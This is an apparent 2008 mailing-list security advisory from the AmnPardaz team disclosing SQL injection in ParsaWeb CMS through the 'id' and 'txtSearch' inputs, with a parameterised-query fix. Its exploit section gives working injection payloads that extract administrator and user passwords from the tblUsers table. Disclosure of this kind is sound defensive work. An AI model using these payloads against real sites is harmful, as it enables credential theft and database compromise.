Date: Sun, 28 Sep 2008 16:01:03 +0330
From: [email protected]
To: [email protected]
Subject: ParsaWeb CMS SQL Injection
MIME-Version: 1.0
Content-Type: text/plain;
charset=ISO-8859-1;
DelSp="Yes";
format="flowed"
Content-Disposition: inline
Content-Transfer-Encoding: quoted-printable
User-Agent: Internet Messaging Program (IMP) H3 (4.1.2)
X-Virus-Scanned: antivirus-gw at tyumen.ru
########################## www.BugReport.ir #######################################
#
#		AmnPardaz Security Research Team
#
# Title: ParsaWeb CMS SQL Injection
# Vendor: http://www.parsagostar.com
# Demo: http://cms.parsagostar.com/
# Exploit: Available
# Impact: High
# Fix: N/A
# Original advisory: http://www.bugreport.ir/index_53.htm
##################################################################################
####################
1. Description:
####################
	ParsaWeb is a commercial ASP.NET website and content management system.
####################
2. Vulnerabilities:
####################
	Input passed to the "id" parameter of default.aspx and to the "txtSearch" field of the search section is not properly sanitised before being used in SQL queries.
	This can be exploited to manipulate the queries by injecting arbitrary SQL code: a quote in txtSearch closes the LIKE pattern and allows a UNION to be appended, and a non-numeric "id" value is evaluated as part of the WHERE clause.
####################
3. Exploits/POCs:
####################
	http://www.example.com/?page=page&id=-164 or 1=(select top 1 user_pass from tblUsers where user_name = 'admin')
	http://www.example.com/?page=Search
	Search:AmnPardaz%') union ALL select '1',user_name+':'+user_pass,'3','4','5','6','7','8','9','10',11 from tblUsers--
####################
4. Solution:
####################
	Edit the source code to ensure that inputs are properly sanitised: pass "id" and "txtSearch" to the database as bound parameters (SqlParameter) instead of concatenating them into the query string, and reject any "id" value that is not an integer before it reaches the query.
####################
5. Credit:
####################
AmnPardaz Security Research & Penetration Testing Group
Contact: admin[4t}bugreport{d0t]ir
www.BugReport.ir
www.AmnPardaz.com